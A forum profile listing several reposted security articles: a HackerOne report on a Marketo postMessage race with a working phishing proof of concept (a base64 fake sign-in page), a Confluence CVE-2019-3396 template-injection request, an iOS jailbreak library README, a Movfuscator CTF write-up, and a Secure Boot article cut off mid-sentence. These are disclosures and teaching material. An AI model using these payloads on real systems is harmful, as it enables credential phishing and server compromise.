Jump to content

Nytro

Administrators
  • Posts

    18753
  • Joined

  • Last visited

  • Days Won

    726

Everything posted by Nytro

  1. Client-Side Race Condition using Marketo, allows sending user to data-protocol in Safari when form without onSuccess is submitted on www.hackerone.com fransrosen submitted a report to HackerOne. Jul 14th (9 months ago) Hi, I made a talk earlier this month about Client-Side Race Conditions for postMessage on AppSecEU: https://speakerdeck.com/fransrosen/owasp-appseceu-2018-attacking-modern-web-technologies In this talk I mention some fun ways to race postMessages from a malicious origin before the legit source sends it. Background As you remember from #207042 you use Marketo for your form-submissions on www.hackerone.com. Now, back then, I abused the fact that no origin was checked on the receiving end of marketo.com. By doing this I was then able to steal the data being submitted. Technical Description In this case however, I noticed that as soon as you submit a form, one of the listener being on www.hackerone.com will pass the content forward to a handler for the specific form that was loaded. As soon as it finds the form that was initiated and submitted, it will either run the error or success-function based on the content of the postMessage. If the message is a success, it will run any form.onSuccess being defined when the form was loaded. You can see some of these in this file: https://www.hackerone.com/sites/default/files/js/js_pdV-E7sfuhFWSyRH44H1WwxQ_J7NeE2bU6XNDJ8w1ak.js form.onSuccess(function() { return false; }); If the onSuccess returns false nothing more will happen. However, if the onSuccess doesn't exist or returns true, the parameter called followUpUrl will instead be sent to location.href. There is no check whatsoever what this URL contains. The code does parse the URL and if a parameter called aliId is set it will append it to the URL. As you might now, the flow of the Marketo-solution looks like this: Form is initiated by loading a JS-file from Marketo. Form shows up on www.hackerone.com Form is submitted. Listener is now initiated on www.hackerone.com Message is sent to Marketo from www.hackerone.com using postMessage Marketo gets the message and runs an ajax call to save it on Marketo When successful, a postMessage is sent from Marketo back to www.hackerone.com with the status. The listener catches the response and checks onSuccess. If onSuccess gives false, don't do anything. If it doesn't exists or returns true, follow the followUpUrl. Exploitation Since no origin check is made on the listener initated in #3, we can from our end try to race the message between #3 and #6. If our message comes through we can direct the user to whatever location we like if we find a form that doesn't utilize onSuccess. Forms on www.hackerone.com Looking at the forms, we can see that one being initiated called mktoForm_1013 does not have any onSuccess-function on it. This means that we can now use the followUpUrl from the postMessage to send the user to our location. We can also see in the URL of your JS-code above that the following URLs contains mktoForm_1013: if (location.pathname == "/product/response") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to get up and running with HackerOne Response? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/bounty") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to tap into the ultimate level of hacker-powered security with HackerOne Bounty? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/challenge") { $('#mktoForm_1013 .mktoHtmlText p').text('Up for a HackerOne Challenge? Want to learn more? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/services") { $('#mktoForm_1013 .mktoHtmlText p').text("We're looking forward to serving you. Give us a few details and we’ll be in touch shortly!"); } else if (location.pathname == "/") { $('#mktoForm_1013 .mktoHtmlText p').text("Start uncovering critical vulnerabilities today. Give us a few details and we’ll be in touch shortly!"); } And as before in the old report, we know that #contact as the fragment will open the form directly without interaction. CSP Due to your CSP, we cannot send the user to javascript:. If your CSP would have allowed it, we would have a proper XSS on www.hackerone.com. Chrome and Firefox also disallows sending the user to a data:-URL. We can send the user to any location we like, but that's no fun. ...but... ...enter Safari. Safari does not restrict top-navigation to data: (tested in macOS 10.13.5, Safari 11.1.1). This means that we can do the following: Have a malicious page opening https://www.hackerone.com/product/response#contact Make it send a bunch of messages saying the form as successfully submitted. When the victim fills in the form and submits, our message will hopefully win, since Marketo needs to both get the postMessage and send an ajax call to save the response until it sends a legit response. We redirect the user to a very good-looking sign-in page for HackerOne. ??? PROFIT!!! PoC When trying this attack I noticed that if Safari opens www.hackerone.com in a new tab instead of a new window, Safari counts the tab as inactive and will slow down the sending of postMessages to the current frame. However, if you open www.hackerone.com in a complete new window, using window.open(url,'','_blank'), Safari will not count the old window as inactive and the messages will be sent just as fast which will significantly increase our chance of winning the race. The following HTML should show you my PoC in Safari: <html> <head> <script> var b; function doit() { setInterval(function() { b.postMessage('{"mktoResponse":{"for":"mktoFormMessage0","error":false,"data":{"formId":"1013","followUpUrl":"data:text/html;base64,PGhlYWQ+PGxpbmsgcmVsPXN0eWxlc2hlZXQgbWVkaWE9YWxsIGhyZWY9aHR0cHM6Ly9oYWNrZXJvbmUuY29tL2Fzc2V0cy9mcm9udGVuZC4wMjAwMjhlOTU1YTg5Zjg1YTVmYzUyMWVhYzMxMDM2OC5jc3MgLz48bGluayByZWw9c3R5bGVzaGVldCBtZWRpYT1hbGwgaHJlZj1odHRwczovL2hhY2tlcm9uZS5jb20vYXNzZXRzL3ZlbmRvci1iZmRlMjkzYTUwOTEzYTA5NWQ4Y2RlOTcwZWE1YzFlNGEzNTI0M2NjNzY3NWI2Mjg2YTJmM2Y3MDI2ZmY1ZTEwLmNzcz48L2hlYWQ+PGJvZHk+PGRpdiBjbGFzcz0iYWxlcnRzIj4KPC9kaXY+PGRpdiBjbGFzcz0ianMtYXBwbGljYXRpb24tcm9vdCBmdWxsLXNpemUiPjxzcGFuIGRhdGEtcmVhY3Ryb290PSIiPjxkaXYgY2xhc3M9ImZ1bGwtc2l6ZSBhcHBsaWNhdGlvbl9mdWxsX3dpZHRoX2xheW91dCI+PGRpdj48ZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zaWduZWQtb3V0Ij48ZGl2IGNsYXNzPSJpbm5lci1jb250YWluZXIiPjxkaXY+PGEgY2xhc3M9ImFwcF9fbG9nbyIgaHJlZj0iLyI+PGltZyBzcmM9Imh0dHBzOi8vaGFja2Vyb25lLmNvbS9hc3NldHMvc3RhdGljL2ludmVydGVkX2xvZ28tYzA0MzBhZjgucG5nIiBhbHQ9IkhhY2tlck9uZSI+PC9hPjxkaXYgY2xhc3M9InRvcGJhci10b2dnbGUiPjxpIGNsYXNzPSJpY29uLWhhbWJ1cmdlciI+PC9pPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWJuYXYtd3JhcHBlciI+PHVsIGNsYXNzPSJ0b3BiYXItc3VibmF2Ij48bGkgY2xhc3M9InRvcGJhci1zdWJuYXYtaXRlbSI+PGEgY2xhc3M9InRvcGJhci1zdWJuYXYtbGluayIgaHJlZj0iL3VzZXJzL3NpZ25faW4iPlNpZ24gSW48L2E+Jm5ic3A7fCZuYnNwOzwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItc3VibmF2LWl0ZW0iPjxhIGNsYXNzPSJ0b3BiYXItc3VibmF2LWxpbmsiIGhyZWY9Ii91c2Vycy9zaWduX3VwIj5TaWduIFVwPC9hPjwvbGk+PC91bD48L2Rpdj48ZGl2IGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi13cmFwcGVyIj48dWwgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uIj48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIj5Gb3IgQnVzaW5lc3M8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Rm9yIEhhY2tlcnM8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayIgaHJlZj0iL2hhY2t0aXZpdHkiPkhhY2t0aXZpdHk8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Q29tcGFueTwvYT48L3NwYW4+PC9saT48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIiBocmVmPSIvdXNlcnMvc2lnbl9pbiI+VHJ5IEhhY2tlck9uZTwvYT48L3NwYW4+PC9saT48L3VsPjwvZGl2PjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWIiPjwvZGl2PjwvZGl2PjxzcGFuPjwvc3Bhbj48L2Rpdj48ZGl2IGNsYXNzPSJmdWxsLXdpZHRoLWNvbnRhaW5lciIgc3R5bGU9InBhZGRpbmctdG9wOiAxNTBweDsiPjxkaXYgY2xhc3M9Im5hcnJvdy13cmFwcGVyIj48ZGl2Pjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSJodHRwczovL2hhY2tlcm9uZS5jb20vdXNlcnMvc2lnbl9pbiIgb25zdWJtaXQ9ImFsZXJ0KCdpIGdvdCBpdDogJyArIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzaWduX2luX2VtYWlsJykudmFsdWUgKyAnOicgKyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaW5wdXQtNCcpLnZhbHVlKTsgcmV0dXJuIGZhbHNlOyIgbm92YWxpZGF0ZT0iIiBjbGFzcz0ic3BlYy1zaWduLWluLWZvcm0iPjxkaXY+PGgxIGNsYXNzPSJzZWN0aW9uLXRpdGxlIHRleHQtYWxpZ25lZC1jZW50ZXIiPlNpZ24gaW4gdG8gSGFja2VyT25lPC9oMT48ZGl2IGNsYXNzPSJuYXJyb3ctY29udGFpbmVyIj48ZGl2IGNsYXNzPSJpbnB1dC13cmFwcGVyIj48bGFiZWwgY2xhc3M9ImlucHV0LWxhYmVsIiBmb3I9InNpZ25faW5fZW1haWwiPkVtYWlsIGFkZHJlc3M8L2xhYmVsPjxpbnB1dCB0eXBlPSJlbWFpbCIgY2xhc3M9ImlucHV0IHNwZWMtc2lnbi1pbi1lbWFpbCIgbmFtZT0idXNlcltlbWFpbF0iIHZhbHVlPSIiIGlkPSJzaWduX2luX2VtYWlsIiBhdXRvY29tcGxldGU9Im9uIj48ZGl2IGNsYXNzPSJoZWxwZXItdGV4dCI+VXNpbmcgU0FNTD8gRW1haWwgYWRkcmVzcyBvbmx5LCBubyBwYXNzd29yZCBuZWVkZWQuPC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0iaW5wdXQtd3JhcHBlciI+PGxhYmVsIGNsYXNzPSJpbnB1dC1sYWJlbCIgZm9yPSJpbnB1dC00Ij5QYXNzd29yZDwvbGFiZWw+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBjbGFzcz0iaW5wdXQgc3BlYy1zaWduLWluLXBhc3N3b3JkIiBuYW1lPSJ1c2VyW3Bhc3N3b3JkXSIgdmFsdWU9IiIgaWQ9ImlucHV0LTQiIGF1dG9jb21wbGV0ZT0ib24iIG1heGxlbmd0aD0iNzIiPjwvZGl2PjxkaXYgY2xhc3M9ImlucHV0LXdyYXBwZXItc21hbGwiPjxkaXYgY2xhc3M9InJlbWVtYmVyLW1lIj48aW5wdXQgdHlwZT0iY2hlY2tib3giIGlkPSJ1c2VyX3JlbWVtYmVyX21lIiBuYW1lPSJ1c2VyW3JlbWVtYmVyX21lXSIgY2xhc3M9InNwZWMtc2lnbi1pbi1yZW1lbWJlci1tZSIgdmFsdWU9IjEiPjxsYWJlbCBmb3I9InVzZXJfcmVtZW1iZXJfbWUiPlJlbWVtYmVyIG1lIGZvciB0d28gd2Vla3M8L2xhYmVsPjwvZGl2PjxhIGhyZWY9Ii91c2Vycy9wYXNzd29yZC9uZXciIGNsYXNzPSJmb3Jnb3QtcGFzc3dvcmQiPkZvcmdvdCB5b3VyIHBhc3N3b3JkPzwvYT48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiBidXR0b24tLXN1Y2Nlc3MgaXMtZnVsbC13aWR0aCBzcGVjLXNpZ24taW4tc3VibWl0IiBuYW1lPSJjb21taXQiIHZhbHVlPSJTaWduIGluIj48L2Rpdj48ZGl2IGNsYXNzPSJuYXJyb3ctZm9vdGVyIj5ObyBhY2NvdW50IHlldD8gPGEgaHJlZj0iL3VzZXJzL3NpZ25fdXAiPkNyZWF0ZSBhbiBhY2NvdW50LjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PC9mb3JtPjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwvc3Bhbj48L2Rpdj48bm9zY3JpcHQ+PGRpdiBjbGFzcz0ianMtZGlzYWJsZWQiPkl0IGxvb2tzIGxpa2UgeW91ciBKYXZhU2NyaXB0IGlzIGRpc2FibGVkLiBUbyB1c2UgSGFja2VyT25lLCBlbmFibGUgSmF2YVNjcmlwdCBpbiB5b3VyIGJyb3dzZXIgYW5kIHJlZnJlc2ggdGhpcyBwYWdlLjwvZGl2Pjwvbm9zY3JpcHQ+PC9ib2R5Pg==","aliId":null}}}','*'); console.log('send...') }, 10); } </script> </head> <body> <a href="#" onclick="b=window.open('https://www.hackerone.com/product/response#contact','b','_blank'); doit(); return false;" target="_blank">Click me and send something</a></body> </html> It's large, but it also contains your login page. 1. User clicks on the malicious page: 2. User fills in the contact form and submits 3. User gets directly redirected to our data-page 4. If they sign in we will steal the creds: PoC-movie Here's a movie showing the scenario: Impact I'm pretty divided on the impact of this. You could argue that this is similar to opening www.hackerone.com from a page, that will on a later time redirect the user to data:, which is fully possible and probably just as sneaky. The only difference would be that this could be properly fixed and the logic of the listener in this case actually enables the attacker to fool the user related to the interaction with the site. Also, most likely a lot of other customers of Marketo are affected by this and if they lack CSP, there will be XSS:es all over the place. Also, if IE11 would support those contact-popups, it would be an XSS due to the lack of CSP-support, however now I'm getting a JS-error trying to open the contact-form... Mitigation What's interesting here though is that you can actually mitigate this easily by making sure you always use onSuccess=function(){return false} to always make sure followUpUrl won't be used. Regards, Frans 5 attachments: F320358: malicious.png F320359: contact.png F320360: sign-in.png F320361: popup.png F320362: safari-location-data.mp4 Sursa: https://hackerone.com/reports/381356
      • 1
      • Upvote
  2. 【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector 发表于 2019-04-06 | 分类于 Web Security | 阅读次数 1141 Twitter: chybeta Security Advisory https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html Analysis According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height. the Widget Connector has defind some renders. for example the FriendFeedRenderer: public class FriendFeedRenderer implements WidgetRenderer { ... public String getEmbeddedHtml(String url, Map<String, String> params) { params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm"); return this.velocityRenderService.render(getEmbedUrl(url), params); } } In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map. However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render Reproduce POST /rest/tinymce/1/macro/preview HTTP/1.1 {"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}} Patch in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this: public class WidgetMacro extends BaseMacro implements Macro, EditorImagePlaceholder { public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory) { ... this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" })); } ... public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) { ... doSanitizeParameters(parameters); return this.renderManager.getEmbeddedHtml(url, parameters); } private void doSanitizeParameters(Map<String, String> parameters) { Objects.requireNonNull(parameters); for (String sanitizedParameter : this.sanitizeFields) { parameters.remove(sanitizedParameter); } } } 点击赞赏二维码,您的支持将鼓励我继续创作! Sursa: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
  3. jelbrekLib Give me tfp0, I give you jelbrek Library with commonly used patches in open-source jailbreaks. Call this a (light?) QiLin open-source alternative. Compiling: ./make.sh Setup Compile OR head over to https://github.com/jakeajames/jelbrekLib/tree/master/downloads and get everything there. Link with jelbrekLib.a & IOKit.tbd and include jelbrekLib.h Call init_jelbrek() with tfp0 as your first thing and term_jelbrek() as your last Issues AMFID patch won't resist after app enters background. Fix would be using a daemon (like amfidebilitate) or injecting a dylib (iOS 11) iOS 12 satus rootFS remount is broken. There is hardening on snapshot_rename() which can and has been (privately) bypassed, but it for sure isn't as bad as last year with iOS 11.3.1, where they made major changes. The only thing we need is figuring out how they check if the snapshot is the rootfs and not something in /var for example where snapshot_rename works fine. kexecute() is also probably broken on A12. Use bazad's PAC bypass which offers the same thing, so this isn't an issue (fr now) getting root, unsandboxing, NVRAM lock/unlock, setHSP4(), trustbin(), entitlePid + task_for_pid() are all working fine. The rest that is not on top of my mind should also work fine. Codesign bypass Patching amfid should be a matter of getting task_for_pid() working. (Note: on A12 you need to take a completely different approach, bazad has proposed an amfid-patch-less-amfid-bypass in here https://github.com/bazad/blanket/tree/master/amfidupe, which will probably work but don't take my word for it). As for the payload dylib, you can just sign it with a legit cert and nobody will complain about the signature. As for unsigned binaries, you'll probably have to sign them with a legit cert as well, due to CoreTrust, or just add to trustcache. Credits theninjaprawn & xerub for patchfinding xerub & Electra team for trustcache injection stek29 for nvramunlock & lock and hsp4 patch theninjaprawn & Ian Beer for dylib injection Luca Todesco for the remount patch technique Umang Raghuvanshi for the original remount idea pwn20wnd for the implementation of the rename-APFS-snapshot technique AMFID dylib-less patch technique by Ian Beer reworked with the patch code from Electra's amfid_payload (stek29 & coolstar) rootless-hsp4 idea by Ian Beer. Implemented on his updated async_wake exploit Sandbox exceptions by stek29 (https://stek29.rocks/2018/01/26/sandbox.html) CSBlob patching with stuff from Jonathan Levin and xerub Symbol finding by me (https://github.com/jakeajames/kernelSymbolFinder) The rest of patches are fairly simple and shouldn't be considered property of anyone in my opinion. Everyone who has enough knowledge can write them fairly easily And, don't forget to tell me if I forgot to credit anyone! Sursa: https://github.com/jakeajames/jelbrekLib
  4. Understanding the Movfuscator 14 MAR 2019 • 12 mins read MoVfuscator is the PoC for the Turing Completeness of Mov instruction. Yes, you guessed it right. It uses only mov’s, except for a few places. This makes reversing difficult, because the control flow is obfuscated. I’ll be analyzing the challenge Mov of UTCTF’19 using IDA Free. MoV The Stack Movfuscator uses its own stack. The stack consists of an array of addresses. The stack looks like this Each element of the stack is at an offset of 0x200064 from it’s stack address. The stack begins at 0x83f70e8 and it grows from high to low address. The stack pointer is saved in the variable sesp. The variable NEW_STACK stores the address of guard. mov esp, NEW_STACK ; address of guard mov esp, [esp-0x200068] ; address of A[n-1] mov esp, [esp-0x200068] ; address of A[n-2] ; ... ; n times ; ... ; use esp So, mov esp, [esp-0x200068], subtracts 4 from esp. Now we can understand what start does. mov dword [esp-4*4], SIGSEGV mov dword [esp-4*4+4], offset sa_dispatch mov dword [esp-4*4+8], 0 call sigaction mov dword [esp-3*4], SIGILL mov dword [esp-3*4+4], offset sa_loop mov dword [esp-3*4+8], 0 call sigaction ; ; ... ; .plt:08048210 public dispatch .plt:08048210 dispatch proc near ; DATA XREF: .data:sa_dispatch↓o .plt:08048210 mov esp, NEW_STACK .plt:08048216 jmp function .plt:08048216 dispatch endp Movfuscator uses SIGSEGV to execute a function, and SIGILL to execute a JMP instruction which jumps to master_loop. Because we can’t mov to eip, which is invalid in x86. Execution is controlled using the on variable. This is a boolean variable that determines whether a statement will be executed or not. The master_loop sets the value of on and then disables toggle_execution. This is the structure of if statement. def logic_if(condition, dest, src) if (condition) dest = src else discard = src It then adds sesp with 4 and stores the sum in stack_temp. Push The array sel_data contains two members - discard and data_p. This is a MUX which selects data_p if on is set. So, if on is set, eax contains the address of NEW_STACK. And the value of esp-4 is stored in NEW_STACK, which is the stack pointer. And then the value of stack_temp is stored in the current stack pointer. The above set of instructions are equivalent to mov eax, [stack_temp] sub esp, 4 mov [esp], eax It can also be represented as push dword [stack_temp] The sequnce of instructions until 0x0804843C do the following mov eax, [sesp] add eax, 4 push eax push dword [sesp] push 0x880484fe It conditionally sets the value of target to branch_temp. The target variable is the destination an unconditional jump. In this code, the target is set to 0x88048744. Let’s see how jump’s are implemented. on = 1 ... target = jump_destination ; save registers R, F, D on = 0 ... if (fetch_addr == target) { ; restore registers R, F, D on = 1 } ... The above code saves the registers. It now checks if the fetch address equals the address contained in target. The equal-to comparison is computed for each byte and the result is the logical-and of the four comparisons. The result of the comparison is stored in the boolean variable b0. Now if b0 is set, the registers are restored and the on variable is set. This is equivalent to the following if the on variable is set. push 0 call _exit You must be wondering how I deduced the call instruction. Here is it Function Call Function calls are implemented using the SIGSEGV signal. The array fault is defined like this .data:085F7198 fault dd offset no_fault ; DATA XREF: _start+51F↑r .data:085F719C dd 0 .data:085F71A0 no_fault dd 0 So, fault when indexed with on returns 0 if on is set, otherwise a valid address. This return value is dereferenced which results in a SIGSEGV (Segmentation Fault) if its zero. But since, the value of target is 0x88048744. The control jumps to main. In main, the registers are restored and the on flag is set. After that it pushes fp, R1, R2, R3, F1, dword_804e04c, D1 into the stack The function prologue It first assigns the frame pointer fp to the current stack pointer and allocates 37 dwords (148 bytes) from the stack. This is equivalent to the following x86 mov ebp, esp ; ebp is **fp** sub esp, 148 Computes fp-19*4 and stores the value of R3 into the address. So, this is basically mov R3, 0 mov [fp-19*4], R3 Great ! So, we have a dword at fp-0x4c initialized to 0. Then we have an array of bytes at fp-0x47 initialized as follows mov R0, 0x1a mov byte [fp-18*4], R0 mov R0, 0x19 mov byte [fp-0x47], R0 mov R0, 11 mov byte [fp-0x46], R0 mov R0, 0x31 mov byte [fp-0x45], R0 mov R0, 6 mov byte [fp-17*4], R0 mov R0, 4 mov byte [fp-0x43], R0 mov R0, 0x18 mov byte [fp-0x42], R0 mov R0, 0x10 mov byte [fp-0x41], R0 mov R0, 10 mov byte [fp-16*4], R0 mov R0, 0x33 mov byte [fp-0x3f], R0 mov R0, 0x19 mov byte [fp-0x3e], R0 mov R0, 10 mov byte [fp-0x3d], R0 mov R0, 0x33 mov byte [fp-15*4], R0 mov R0, 0 mov byte [fp-0x3b], R0 mov R0, 10 mov byte [fp-0x3a], R0 mov R0, 0x3c mov byte [fp-0x39], R0 mov R0, 0x19 mov byte [fp-14*4], R0 mov R0, 13 mov byte [fp-0x37], R0 mov R0, 6 mov byte [fp-0x36], R0 mov R0, 0x19 mov byte [fp-0x35], R0 mov R0, 0x3c mov byte [fp-13*4], R0 mov R0, 14 mov byte [fp-0x33], R0 mov R0, 0x10 mov byte [fp-0x32], R0 mov R0, 0x3c mov byte [fp-0x31], R0 mov R0, 0x10 mov byte [fp-12*4], R0 mov R0, 12 mov byte [fp-0x2f], R0 mov R0, 0x32 mov byte [fp-0x2e], R0 mov R0, 10 mov byte [fp-0x2d], R0 mov R0, 0x14 mov byte [fp-11*4], R0 mov R0, 13 mov byte [fp-0x2b], R0 mov R0, 6 mov byte [fp-0x2a], R0 mov R0, 0x19 mov byte [fp-0x29], R0 mov R0, 0x3c mov byte [fp-10*4], R0 mov R0, 0x19 mov byte [fp-0x27], R0 mov R0, 6 mov byte [fp-0x26], R0 mov R0, 0x33 mov byte [fp-0x25], R0 mov R0, 4 mov byte [fp-9*4], R0 mov R0, 10 mov byte [fp-0x23], R0 mov R0, 0x33 mov byte [fp-0x22], R0 mov R0, 0x19 mov byte [fp-0x21], R0 mov R0, 14 mov byte [fp-8*4], R0 mov R0, 6 mov byte [fp-0x1f], R0 mov R0, 0x31 mov byte [fp-0x1e], R0 mov R0, 0x31 mov byte [fp-0x1d], R0 mov R0, 0x1e mov byte [fp-7*4], R0 mov R0, 0x3c mov byte [fp-0x1b], R0 mov R0, 0x17 mov byte [fp-0x1a], R0 mov R0, 10 mov byte [fp-0x19], R0 mov R0, 0x31 mov byte [fp-6*4], R0 mov R0, 6 mov byte [fp-0x17], R0 mov R0, 0x19 mov byte [fp-0x16], R0 mov R0, 10 mov byte [fp-0x15], R0 mov R0, 9 mov byte [fp-5*4], R0 mov R0, 0x3c mov byte [fp-0x13], R0 mov R0, 0x19 mov byte [fp-0x12], R0 mov R0, 12 mov byte [fp-0x11], R0 mov R0, 0x3c mov byte [fp-4*4], R0 mov R0, 0x19 mov byte [fp-0xf], R0 mov R0, 13 mov byte [fp-0xe], R0 mov R0, 10 mov byte [fp-0xd], R0 mov R0, 0x3c mov byte [fp-3*4], R0 mov R0, 0 mov byte [fp-0xb], R0 mov R0, 13 mov byte [fp-0xa], R0 mov R0, 6 mov byte [fp-0x9], R0 mov R0, 0x31 mov byte [fp-2*4], R0 mov R0, 0x31 mov byte [fp-7], R0 mov R0, 10 mov byte [fp-6], R0 mov R0, 0x33 mov byte [fp-5], R0 mov R0, 4 mov byte [fp-4], R0 mov R0, 10 mov byte [fp-3], R0 mov R0, 2 mov byte [fp-2], R0 At 0x804ba9c, the int variable at fp-0x4c is set to 0. If target is 0x8804bb37, it executes the following if (target == 0x8804bb37) { ; restore the registers R{0,1,2,3} = jmp_r{0,1,2,3} F{0,1} = jmp_f{0,1} D{0,1} = jmp_d{0, 1} dword_804e044 = dword_85f717c dword_804e04c = dword_85f7184 ; set execution flag on = 1 } mov R3, [fp-19*4] if (on) { mov R3, [R3] mov R2, [fp-37*4] add R2, R3 mov R1, [fp-18*4] add R3, R1 mov R0, byte [R3] mov R3, R0 xor R3, 0x53 sub R3, 3 xor R3, 0x33 mov R0, R3 mov [R2], R0 } Since, the target contains 0x88048744 which is not 0x8804bb37, none of the instructions in the if enclosed by on is executed. At 0x0804C2D4, we have another branch check if (target == 0x8804C2D4) { RESTORE_REGS() on = 1 } mov R3, [fp-19*4] if (on) { add R3, 1 mov [fp-19*4], R3 mov R3, [fp-19*4] setc sbb R3, 0x47 mov branch_temp, 0x8804bb37 } alu_false contains 1 at index 0, and 0 at the remaining indices. So, this sets the complement of the Carry flag. ZeroFlag is evaluated as a NOR logic, i.e., ZF = !(alu_s[0] | alu_s[1] | alu_s[2] | alu_s[3]) alu_b7 is an array of 256 dwords, the first 128 are zero, and the rest are 1. Indexing into this array determines the Sign bit (bit 7) of the index. Okay, so alu_cmp_of represents a truth table. Of what ? Well, there are only two out of the eight minterms set. So, we get the following SOP x'ys + xy's' Where x, y, s are the sign bits of alu_x, alu_y, alu_z. Cool ! This is the overflow flag It xor’s SignFlag and OverflowFlag and sets target to branch_temp which is 0x8804bb37. By x0ring the sign and overflow flags we get the LessThan flag. So, if R3 is less than 0x47, the target is set to 0x8804bb37. Then we have the following mov byte [fp-0x4d], 0 if (target == 0x8804CA3B) { on = 1 } if (on) { mov esp, fp mov D1, [esp] mov dword_804e04c, [esp+4] sub esp, 4*2 mov eax, [esp] sub esp, 4 mov F1, eax mov eax, [esp] sub esp, 4 mov R3, eax mov eax, [esp] sub esp, 4 mov R2, eax mov eax, [esp] sub esp, 4 mov R1, eax mov eax, [esp] sub esp, 4 mov fp, eax mov eax, [esp] sub esp, 4 mov branch_temp, eax mov target, branch_temp on = 0 } A SIGILL is executed which causes the control to jump to master loop. And the execution of the instructions are skipped until the address the control reaches at 0x804bb37 So, this is basically a while loop. Wow !! The control first compares R3 with 0x47 and branches to 0x804bb37 while R3 is less than 0x47. When the condition becomes false, it executes from 0x804ca3b Algorithm So, the logic is int main() { int i = 0; char arr[] = { 26, 25, 11, 49, 6, 4, 24, 16, 10, 51, 25, 10, 51, 0, 10, 60, 25, 13, 6, 25, 60, 14, 16, 60, 16, 12, 50, 10, 20, 13, 6, 25, 60, 25, 6, 51, 4, 10, 51, 25, 14, 6, 49, 49, 30, 60, 23, 10, 49, 6, 25, 10, 9, 60, 25, 12, 60, 25, 13, 10, 60, 0, 13, 6, 49, 49, 10, 51, 4, 10, 2 }; for (i = 0; i < 0x47; ++i) { arr[i] = (arr[i]^0x53)-3 ^ 0x33; } } Executing the above code, yields the flag - utflag{sentence_that_is_somewhat_tangentially_related_to_the_challenge} Sursa: https://x0r19x91.github.io/2019/utctf-mov
  5. ValdikSS April 1, 2019 at 01:24 PM Exploiting signed bootloaders to circumvent UEFI Secure Boot UEFI, Information Security Русская версия этой статьи. Modern PC motherboards' firmware follow UEFI specification since 2010. In 2013, a new technology called Secure Boot appeared, intended to prevent bootkits from being installed and run. Secure Boot prevents the execution of unsigned or untrusted program code (.efi programs and operating system boot loaders, additional hardware firmware like video card and network adapter OPROMs). Secure Boot can be disabled on any retail motherboard, but a mandatory requirement for changing its state is physical presence of the user at the computer. It is necessary to enter UEFI settings when the computer boots, and only then it's possible to change Secure Boot settings. Most motherboards include only Microsoft keys as trusted, which forces bootable software vendors to ask Microsoft to sign their bootloaders. This process include code audit procedure and justification for the need to sign their file with globally trusted key if they want the disk or USB flash to work in Secure Boot mode without adding their key on each computer manually. Linux distributions, hypervisors, antivirus boot disks, computer recovery software authors all have to sign their bootloaders in Microsoft. I wanted to make a bootable USB flash drive with various computer recovery software that would boot without disabling Secure Boot. Let's see how this can be achieved. Signed bootloaders of bootloaders So, to boot Linux with Secure Boot enabled, you need a signed bootloader. Microsoft forbid to sign software licensed under GPLv3 because of 